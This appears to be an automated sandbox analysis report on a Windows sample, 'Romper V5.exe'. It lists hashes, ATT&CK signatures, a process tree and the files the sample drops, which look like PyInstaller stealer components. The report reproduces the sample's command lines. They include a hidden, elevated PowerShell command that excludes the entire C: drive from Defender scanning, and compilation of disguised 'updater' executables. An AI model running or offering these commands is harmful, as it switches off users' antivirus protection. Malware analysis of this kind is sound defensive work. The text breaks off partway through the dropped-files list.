291f746c2eb1c7f1c979899d9a61c44b8f3085622f0b311cfa99fc0e584b1aac

Analysis

max time kernel
8s
max time network
27s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
01-07-2024 01:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Romper V5/Romper V5.exe
Size

30.1MB
MD5

20ccae603d435aab174b7b7e46ac7189
SHA1

c4c34d0a46c2f9532596f6dcb6fb86cc44046ab7
SHA256

cf675be72d39b1ee645b19bdbebbc615d6787d3f1c0e7ca9e2ef7c4396a7764b
SHA512

69658a3e15a9885691098976b89e8e2dd2936cbc78f0f0d58400dbf98fa14c4e170f9180b1ab130cc796b3a4b4245879e8406860770e03f3223a01d25532beb9
SSDEEP

786432:GW+e569MZLW+e569MuW+e569MgjW+e5i9M:GW+enhW+enuW+engjW+ev

Score

8^/10

execution pyinstaller

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

732 powershell.exe
2172 powershell.exe
908 powershell.exe
5028 powershell.exe
4884 powershell.exe
3816 powershell.exe
1568 powershell.exe
1456 powershell.exe
1776 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Romper V5.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation Romper V5.exe
Executes dropped EXE 8 IoCs

Processes:

COOKD.EXECREAL.EXEDISCORD.EXEPYTHON.EXECOOKD.EXECREAL.EXEDISCORD.EXEPYTHON.EXE

pid process

1552 COOKD.EXE
2256 CREAL.EXE
208 DISCORD.EXE
4908 PYTHON.EXE
2612 COOKD.EXE
2608 CREAL.EXE
1192 DISCORD.EXE
4680 PYTHON.EXE

pid	process
732	powershell.exe
2172	powershell.exe
908	powershell.exe
5028	powershell.exe
4884	powershell.exe
3816	powershell.exe
1568	powershell.exe
1456	powershell.exe
1776	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation	Romper V5.exe

pid	process
1552	COOKD.EXE
2256	CREAL.EXE
208	DISCORD.EXE
4908	PYTHON.EXE
2612	COOKD.EXE
2608	CREAL.EXE
1192	DISCORD.EXE
4680	PYTHON.EXE

Loads dropped DLL 37 IoCs

Processes:

COOKD.EXECREAL.EXEDISCORD.EXEPYTHON.EXE

pid	process
2612	COOKD.EXE
2612	COOKD.EXE
2612	COOKD.EXE
2608	CREAL.EXE
2608	CREAL.EXE
2612	COOKD.EXE
1192	DISCORD.EXE
2612	COOKD.EXE
1192	DISCORD.EXE
2612	COOKD.EXE
2612	COOKD.EXE
2612	COOKD.EXE
2612	COOKD.EXE
2612	COOKD.EXE
4680	PYTHON.EXE
4680	PYTHON.EXE
4680	PYTHON.EXE
4680	PYTHON.EXE
4680	PYTHON.EXE
4680	PYTHON.EXE
1192	DISCORD.EXE
1192	DISCORD.EXE
1192	DISCORD.EXE
1192	DISCORD.EXE
1192	DISCORD.EXE
1192	DISCORD.EXE
1192	DISCORD.EXE
1192	DISCORD.EXE
1192	DISCORD.EXE
2608	CREAL.EXE
2608	CREAL.EXE
2608	CREAL.EXE
2608	CREAL.EXE
2608	CREAL.EXE
2608	CREAL.EXE
2608	CREAL.EXE
2608	CREAL.EXE

Detects Pyinstaller 4 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\COOKD.EXE	pyinstaller
C:\Users\Admin\AppData\Local\Temp\CREAL.EXE	pyinstaller
C:\Users\Admin\AppData\Local\Temp\DISCORD.EXE	pyinstaller
C:\Users\Admin\AppData\Local\Temp\PYTHON.EXE	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2172	powershell.exe
2172	powershell.exe
2172	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe
5028	powershell.exe
5028	powershell.exe
5028	powershell.exe
4884	powershell.exe
4884	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2172 powershell.exe
Token: SeDebugPrivilege 732 powershell.exe
Token: SeDebugPrivilege 5028 powershell.exe
Token: SeDebugPrivilege 4884 powershell.exe

description	pid	process
Token: SeDebugPrivilege	2172	powershell.exe
Token: SeDebugPrivilege	732	powershell.exe
Token: SeDebugPrivilege	5028	powershell.exe
Token: SeDebugPrivilege	4884	powershell.exe

Suspicious use of WriteProcessMemory 42 IoCs

Processes:

Romper V5.exeCOOKD.EXECREAL.EXEDISCORD.EXEPYTHON.EXEPYTHON.EXECOOKD.EXEDISCORD.EXEpowershell.execmd.exepowershell.execmd.exeCREAL.EXE

description	pid	process	target process
PID 2264 wrote to memory of 1552	2264	Romper V5.exe	COOKD.EXE
PID 2264 wrote to memory of 1552	2264	Romper V5.exe	COOKD.EXE
PID 2264 wrote to memory of 2256	2264	Romper V5.exe	CREAL.EXE
PID 2264 wrote to memory of 2256	2264	Romper V5.exe	CREAL.EXE
PID 2264 wrote to memory of 208	2264	Romper V5.exe	DISCORD.EXE
PID 2264 wrote to memory of 208	2264	Romper V5.exe	DISCORD.EXE
PID 2264 wrote to memory of 4908	2264	Romper V5.exe	PYTHON.EXE
PID 2264 wrote to memory of 4908	2264	Romper V5.exe	PYTHON.EXE
PID 1552 wrote to memory of 2612	1552	COOKD.EXE	COOKD.EXE
PID 1552 wrote to memory of 2612	1552	COOKD.EXE	COOKD.EXE
PID 2256 wrote to memory of 2608	2256	CREAL.EXE	CREAL.EXE
PID 2256 wrote to memory of 2608	2256	CREAL.EXE	CREAL.EXE
PID 208 wrote to memory of 1192	208	DISCORD.EXE	DISCORD.EXE
PID 208 wrote to memory of 1192	208	DISCORD.EXE	DISCORD.EXE
PID 4908 wrote to memory of 4680	4908	PYTHON.EXE	PYTHON.EXE
PID 4908 wrote to memory of 4680	4908	PYTHON.EXE	PYTHON.EXE
PID 4680 wrote to memory of 1848	4680	PYTHON.EXE	cmd.exe
PID 4680 wrote to memory of 1848	4680	PYTHON.EXE	cmd.exe
PID 2612 wrote to memory of 732	2612	COOKD.EXE	powershell.exe
PID 2612 wrote to memory of 732	2612	COOKD.EXE	powershell.exe
PID 1192 wrote to memory of 2172	1192	DISCORD.EXE	powershell.exe
PID 1192 wrote to memory of 2172	1192	DISCORD.EXE	powershell.exe
PID 4680 wrote to memory of 2156	4680	PYTHON.EXE	Conhost.exe
PID 4680 wrote to memory of 2156	4680	PYTHON.EXE	Conhost.exe
PID 2172 wrote to memory of 5028	2172	powershell.exe	powershell.exe
PID 2172 wrote to memory of 5028	2172	powershell.exe	powershell.exe
PID 1192 wrote to memory of 1832	1192	DISCORD.EXE	cmd.exe
PID 1192 wrote to memory of 1832	1192	DISCORD.EXE	cmd.exe
PID 1832 wrote to memory of 4632	1832	cmd.exe	csc.exe
PID 1832 wrote to memory of 4632	1832	cmd.exe	csc.exe
PID 1832 wrote to memory of 4632	1832	cmd.exe	csc.exe
PID 4680 wrote to memory of 4300	4680	PYTHON.EXE	curl.exe
PID 4680 wrote to memory of 4300	4680	PYTHON.EXE	curl.exe
PID 732 wrote to memory of 4884	732	powershell.exe	powershell.exe
PID 732 wrote to memory of 4884	732	powershell.exe	powershell.exe
PID 2612 wrote to memory of 1896	2612	COOKD.EXE	cmd.exe
PID 2612 wrote to memory of 1896	2612	COOKD.EXE	cmd.exe
PID 1896 wrote to memory of 1700	1896	cmd.exe	csc.exe
PID 1896 wrote to memory of 1700	1896	cmd.exe	csc.exe
PID 1896 wrote to memory of 1700	1896	cmd.exe	csc.exe
PID 2608 wrote to memory of 908	2608	CREAL.EXE	powershell.exe
PID 2608 wrote to memory of 908	2608	CREAL.EXE	powershell.exe

C:\Users\Admin\AppData\Local\Temp\Romper V5\Romper V5.exe
"C:\Users\Admin\AppData\Local\Temp\Romper V5\Romper V5.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2264

C:\Users\Admin\AppData\Local\Temp\COOKD.EXE
"C:\Users\Admin\AppData\Local\Temp\COOKD.EXE"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1552

C:\Users\Admin\AppData\Local\Temp\COOKD.EXE
"C:\Users\Admin\AppData\Local\Temp\COOKD.EXE"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process powershell -Verb runAs -ArgumentList \"-Command Set-MpPreference -ExclusionPath c:\\\" -WindowStyle Hidden"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -ExclusionPath c:\
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Users\Admin\AppData\Local\PCHealthCheck.exe C:\Users\Admin\AppData\Local\Temp\PCHealthCheck.cs > nul 2>&1
4⤵
- Suspicious use of WriteProcessMemory
PID:1896

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Users\Admin\AppData\Local\PCHealthCheck.exe C:\Users\Admin\AppData\Local\Temp\PCHealthCheck.cs
5⤵
PID:1700

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7A70.tmp" "c:\Users\Admin\AppData\Local\CSC85664BE144904D36B4E04A37A239B4B4.TMP"
6⤵
PID:4688

C:\Windows\SYSTEM32\cscript.exe
cscript.exe //nologo C:\Users\Admin\AppData\Local\Temp\launch.vbs
4⤵
PID:1116

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b C:\Users\Admin\AppData\Local\Temp\temporary.cmd
5⤵
PID:1628

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:2156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\temporary.cmd
6⤵
PID:4752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest https://www.python.org/ftp/python/ -UseBasicParsing | Select-String -Pattern '3.10.[0-9]{1,2}' -AllMatches | Select-Object -ExpandProperty Matches | Select-Object -ExpandProperty Value | Sort-Object -Descending -Unique | Select-Object -First 1"
7⤵
PID:2040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest https://www.python.org/ftp/python/ -UseBasicParsing | Select-String -Pattern '3.10.[0-9]{1,2}' -AllMatches | Select-Object -ExpandProperty Matches | Select-Object -ExpandProperty Value | Sort-Object -Descending -Unique | Select-Object -First 1"
8⤵
- Command and Scripting Interpreter: PowerShell
PID:1776

C:\Windows\system32\curl.exe
curl -L -o "C:\Users\Admin\AppData\Local\Temp\python-installer.exe" "https://www.python.org/ftp/python/3.10.9/python-3.10.9-amd64.exe"
7⤵
PID:4300

C:\Users\Admin\AppData\Local\Temp\CREAL.EXE
"C:\Users\Admin\AppData\Local\Temp\CREAL.EXE"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2256

C:\Users\Admin\AppData\Local\Temp\CREAL.EXE
"C:\Users\Admin\AppData\Local\Temp\CREAL.EXE"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process powershell -Verb runAs -ArgumentList \"-Command Set-MpPreference -ExclusionPath c:\\\" -WindowStyle Hidden"
4⤵
- Command and Scripting Interpreter: PowerShell
PID:908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -ExclusionPath c:\
5⤵
- Command and Scripting Interpreter: PowerShell
PID:3816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Users\Admin\AppData\Roaming\WindowsUpdater.exe C:\Users\Admin\AppData\Local\Temp\WindowsUpdater.cs > nul 2>&1
4⤵
PID:2620

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Users\Admin\AppData\Roaming\WindowsUpdater.exe C:\Users\Admin\AppData\Local\Temp\WindowsUpdater.cs
5⤵
PID:4848

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7E48.tmp" "c:\Users\Admin\AppData\Roaming\CSC8FC59BF3F28440B48417623FECC2152.TMP"
6⤵
PID:4340

C:\Windows\SYSTEM32\cscript.exe
cscript.exe //nologo C:\Users\Admin\AppData\Local\Temp\launch.vbs
4⤵
PID:2940

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b C:\Users\Admin\AppData\Local\Temp\temporary.cmd
5⤵
PID:3788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\temporary.cmd
6⤵
PID:2388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest https://www.python.org/ftp/python/ -UseBasicParsing | Select-String -Pattern '3.10.[0-9]{1,2}' -AllMatches | Select-Object -ExpandProperty Matches | Select-Object -ExpandProperty Value | Sort-Object -Descending -Unique | Select-Object -First 1"
7⤵
PID:4528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest https://www.python.org/ftp/python/ -UseBasicParsing | Select-String -Pattern '3.10.[0-9]{1,2}' -AllMatches | Select-Object -ExpandProperty Matches | Select-Object -ExpandProperty Value | Sort-Object -Descending -Unique | Select-Object -First 1"
8⤵
- Command and Scripting Interpreter: PowerShell
PID:1456

C:\Windows\system32\curl.exe
curl -L -o "C:\Users\Admin\AppData\Local\Temp\python-installer.exe" "https://www.python.org/ftp/python/3.10.9/python-3.10.9-amd64.exe"
7⤵
PID:5016

C:\Users\Admin\AppData\Local\Temp\DISCORD.EXE
"C:\Users\Admin\AppData\Local\Temp\DISCORD.EXE"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:208

C:\Users\Admin\AppData\Local\Temp\DISCORD.EXE
"C:\Users\Admin\AppData\Local\Temp\DISCORD.EXE"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process powershell -Verb runAs -ArgumentList \"-Command Set-MpPreference -ExclusionPath c:\\\" -WindowStyle Hidden"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2172

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -ExclusionPath c:\
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Users\Admin\AppData\Local\ChromeUpdater.exe C:\Users\Admin\AppData\Local\Temp\ChromeUpdater.cs > nul 2>&1
4⤵
- Suspicious use of WriteProcessMemory
PID:1832

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Users\Admin\AppData\Local\ChromeUpdater.exe C:\Users\Admin\AppData\Local\Temp\ChromeUpdater.cs
5⤵
PID:4632

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7A71.tmp" "c:\Users\Admin\AppData\Local\CSC45BB282798846B48BE89065A0C02C26.TMP"
6⤵
PID:1888

C:\Windows\SYSTEM32\cscript.exe
cscript.exe //nologo C:\Users\Admin\AppData\Local\Temp\launch.vbs
4⤵
PID:4080

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b C:\Users\Admin\AppData\Local\Temp\temporary.cmd
5⤵
PID:3212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\temporary.cmd
6⤵
PID:380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest https://www.python.org/ftp/python/ -UseBasicParsing | Select-String -Pattern '3.10.[0-9]{1,2}' -AllMatches | Select-Object -ExpandProperty Matches | Select-Object -ExpandProperty Value | Sort-Object -Descending -Unique | Select-Object -First 1"
7⤵
PID:4388

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest https://www.python.org/ftp/python/ -UseBasicParsing | Select-String -Pattern '3.10.[0-9]{1,2}' -AllMatches | Select-Object -ExpandProperty Matches | Select-Object -ExpandProperty Value | Sort-Object -Descending -Unique | Select-Object -First 1"
8⤵
- Command and Scripting Interpreter: PowerShell
PID:1568

C:\Windows\system32\curl.exe
curl -L -o "C:\Users\Admin\AppData\Local\Temp\python-installer.exe" "https://www.python.org/ftp/python/3.10.9/python-3.10.9-amd64.exe"
7⤵
PID:2688

C:\Users\Admin\AppData\Local\Temp\PYTHON.EXE
"C:\Users\Admin\AppData\Local\Temp\PYTHON.EXE"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4908

C:\Users\Admin\AppData\Local\Temp\PYTHON.EXE
"C:\Users\Admin\AppData\Local\Temp\PYTHON.EXE"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c
4⤵
PID:1848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
4⤵
PID:2156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c
4⤵
PID:4300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
4⤵
PID:3660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c
4⤵
PID:3856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
4⤵
PID:3964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c
4⤵
PID:5080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
4⤵
PID:2692

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\COOKD.EXE
Filesize
7.5MB

MD5
a4d88d60fdebe4d85736d7684de377d5

SHA1
3cd96116e5ee43b28a499ea48eff1533b029d8be

SHA256
13611a82912fc262cec5433aeb83c62e6488c5931359749c8a29dcc3bc66c731

SHA512
739223bae82b42c55bdabc0e7d94d0f9daf4b130317122a491ad36e34da0f3a6ba30e87ef0aeba4319aded8a156f31ffdbcb803921f208c7e00ea7ee11e144b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\CREAL.EXE
Filesize
7.5MB

MD5
2dc33067754eb099bd137180a357088b

SHA1
65ec6e077726a462fe96c32f0540891e76cabc4e

SHA256
78b6b54a4643d3648f9653cfd9ec89b0d158f586647e7afc1b78113e1b988585

SHA512
b0073ba54eebfc0afc1ce8c72d9dc87050e434d77f86d2c3d4cfc00c2d84463cd0ab7891e74eaea92de46c934ff13f61202d4f33d6209e45b4b96e064348d7fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\DISCORD.EXE
Filesize
7.4MB

MD5
3cc78ec13e19e7deacb003b556afa189

SHA1
26f4ce646c930464b07c3eb8d7f888354df0f73b

SHA256
c11cf38be5e32cf2f7172a47dd93bff04168b4f607a26558d84b90783ba67372

SHA512
23bd312a390f7779085732a648026bb06f215ebde483dd1b824b53be03382173b0626be5683860c0c3b806dd081677165b99305ff8990c086231f818f03828b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\PYTHON.EXE
Filesize
7.3MB

MD5
ac69ea4dae2d61194cedc40f423fc240

SHA1
9ec71b517b7e7c36091dbf96fb8eb0577cf0b7f2

SHA256
aabbc779eef339c207509e4ca1ab3cf82abe780c3a5c2cecf39cb3730de5cf61

SHA512
0c224aeccc66a19bc2ab2911c70a7b2a6bbd5c4cc8f57c3001c7e1f6dfb5c2aa310b73e669592a9c3f244d352bff37f5c912ed37a4e860a62ef1a508de1acc8b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15522\VCRUNTIME140.dll
Filesize
106KB

MD5
4585a96cc4eef6aafd5e27ea09147dc6

SHA1
489cfff1b19abbec98fda26ac8958005e88dd0cb

SHA256
a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

SHA512
d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15522\VCRUNTIME140_1.dll
Filesize
48KB

MD5
7e668ab8a78bd0118b94978d154c85bc

SHA1
dbac42a02a8d50639805174afd21d45f3c56e3a0

SHA256
e4b533a94e02c574780e4b333fcf0889f65ed00d39e32c0fbbda2116f185873f

SHA512
72bb41db17256141b06e2eaeb8fc65ad4abdb65e4b5f604c82b9e7e7f60050734137d602e0f853f1a38201515655b6982f2761ee0fa77c531aa58591c95f0032

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15522\_hashlib.pyd
Filesize
63KB

MD5
f495d1897a1b52a2b15c20dcecb84b47

SHA1
8cb65590a8815bda58c86613b6386b5982d9ec3f

SHA256
e47e76d70d508b62924fe480f30e615b12fdd7745c0aac68a2cddabd07b692ae

SHA512
725d408892887bebd5bcf040a0ecc6a4e4b608815b9dea5b6f7b95c812715f82079896df33b0830c9f787ffe149b8182e529bb1f78aadd89df264cf8853ee4c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15522\_wmi.pyd
Filesize
35KB

MD5
ee33f4c8d17d17ad62925e85097b0109

SHA1
8c4a03531cf3dbfe6f378fdab9699d51e7888796

SHA256
79adca5037d9145309d3bd19f7a26f7bb7da716ee86e01073c6f2a9681e33dad

SHA512
60b0705a371ad2985db54a91f0e904eea502108663ea3c3fb18ed54671be1932f4f03e8e3fd687a857a5e3500545377b036276c69e821a7d6116b327f5b3d5c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15522\base_library.zip
Filesize
1.3MB

MD5
3909f1a45b16c6c6ef797032de7e3b61

SHA1
5a243f6c8db11bf401aeac69f4c2a0c6cd63b3a8

SHA256
56cce68da6a7ebd11aab4b4a4e6a164647b42b29ae57656532c530d1e22e5b44

SHA512
647e343eb9732150c0fd12c7142a960ede969b41d5a567940e89636f021f0c0b3249b6cfc99c732190085bcae7aa077f8ac52c8e7fe7817d48a34489f0cd5148

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15522\python312.dll
Filesize
6.6MB

MD5
5c5602cda7ab8418420f223366fff5db

SHA1
52f81ee0aef9b6906f7751fd2bbd4953e3f3b798

SHA256
e7890e38256f04ee0b55ac5276bbf3ac61392c3a3ce150bb5497b709803e17ce

SHA512
51c3b4f29781bb52c137ddb356e1bc5a37f3a25f0ed7d89416b14ed994121f884cb3e40ccdbb211a8989e3bd137b8df8b28e232f98de8f35b03965cfce4b424f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15522\pywin32_system32\pywintypes312.dll
Filesize
131KB

MD5
26d752c8896b324ffd12827a5e4b2808

SHA1
447979fa03f78cb7210a4e4ba365085ab2f42c22

SHA256
bd33548dbdbb178873be92901b282bad9c6817e3eac154ca50a666d5753fd7ec

SHA512
99c87ab9920e79a03169b29a2f838d568ca4d4056b54a67bc51caf5c0ff5a4897ed02533ba504f884c6f983ebc400743e6ad52ac451821385b1e25c3b1ebcee0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15522\win32\win32api.pyd
Filesize
130KB

MD5
3a80fea23a007b42cef8e375fc73ad40

SHA1
04319f7552ea968e2421c3936c3a9ee6f9cf30b2

SHA256
b70d69d25204381f19378e1bb35cc2b8c8430aa80a983f8d0e8e837050bb06ef

SHA512
a63bed03f05396b967858902e922b2fbfb4cf517712f91cfaa096ff0539cf300d6b9c659ffee6bf11c28e79e23115fd6b9c0b1aa95db1cbd4843487f060ccf40

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49082\_bz2.pyd
Filesize
82KB

MD5
c7ce973f261f698e3db148ccad057c96

SHA1
59809fd48e8597a73211c5df64c7292c5d120a10

SHA256
02d772c03704fe243c8de2672c210a5804d075c1f75e738d6130a173d08dfcde

SHA512
a924750b1825747a622eef93331fd764d824c954297e37e8dc93a450c11aa7ab3ad7c3b823b11656b86e64de3cd5d409fda15db472488dfaa4bb50341f0b29d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49082\_ctypes.pyd
Filesize
121KB

MD5
10fdcf63d1c3c3b7e5861fbb04d64557

SHA1
1aa153efec4f583643046618b60e495b6e03b3d7

SHA256
bc3b83d2dc9e2f0e6386ed952384c6cf48f6eed51129a50dfd5ef6cbbc0a8fb3

SHA512
dc702f4100ed835e198507cd06fa5389a063d4600fc08be780690d729ab62114fd5e5b201d511b5832c14e90a5975ed574fc96edb5a9ab9eb83f607c7a712c7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49082\_decimal.pyd
Filesize
247KB

MD5
21c73e7e0d7dad7a1fe728e3b80ce073

SHA1
7b363af01e83c05d0ea75299b39c31d948bbfe01

SHA256
a28c543976aa4b6d37da6f94a280d72124b429f458d0d57b7dbcf71b4bea8f73

SHA512
0357102bffc2ec2bc6ff4d9956d6b8e77ed8558402609e558f1c1ebc1baca6aeaa5220a7781a69b783a54f3e76362d1f74d817e4ee22aac16c7f8c86b6122390

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49082\_lzma.pyd
Filesize
155KB

MD5
4e2239ece266230ecb231b306adde070

SHA1
e807a078b71c660db10a27315e761872ffd01443

SHA256
34130d8abe27586ee315262d69af4e27429b7eab1f3131ea375c2bb62cf094be

SHA512
86e6a1eab3529e600dd5caab6103e34b0f618d67322a5ecf1b80839faa028150c492a5cf865a2292cc8584fba008955da81a50b92301583424401d249c5f1401

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49082\_socket.pyd
Filesize
81KB

MD5
899380b2d48df53414b974e11bb711e3

SHA1
f1d11f7e970a7cd476e739243f8f197fcb3ad590

SHA256
b38e66e6ee413e5955ef03d619cadd40fca8be035b43093d2342b6f3739e883e

SHA512
7426ca5e7a404b9628e2966dae544f3e8310c697145567b361825dc0b5c6cd87f2caf567def8cd19e73d68643f2f38c08ff4ff0bb0a459c853f241b8fdf40024

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49082\base_library.zip
Filesize
1.3MB

MD5
73f91fe1b7771f022020ddf0ac619cde

SHA1
d9ecb3061627c94f2cf6c1b7a34fea2cdbd13df7

SHA256
763457ec96d1d2afddffa85523d59aa351208bfdf607f5c5f3fb79a518b6d0c2

SHA512
cb85666c7e50e3dbf14fc215ec05d9576b884066983fe97fa10a40c6a8d6be11c68ca853e7f7039ec67e6b2d90e8c8a3273039b4b86d91d311bcddcdd831b507

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49082\libcrypto-3.dll
Filesize
4.9MB

MD5
51e8a5281c2092e45d8c97fbdbf39560

SHA1
c499c810ed83aaadce3b267807e593ec6b121211

SHA256
2a234b5aa20c3faecf725bbb54fb33f3d94543f78fa7045408e905593e49960a

SHA512
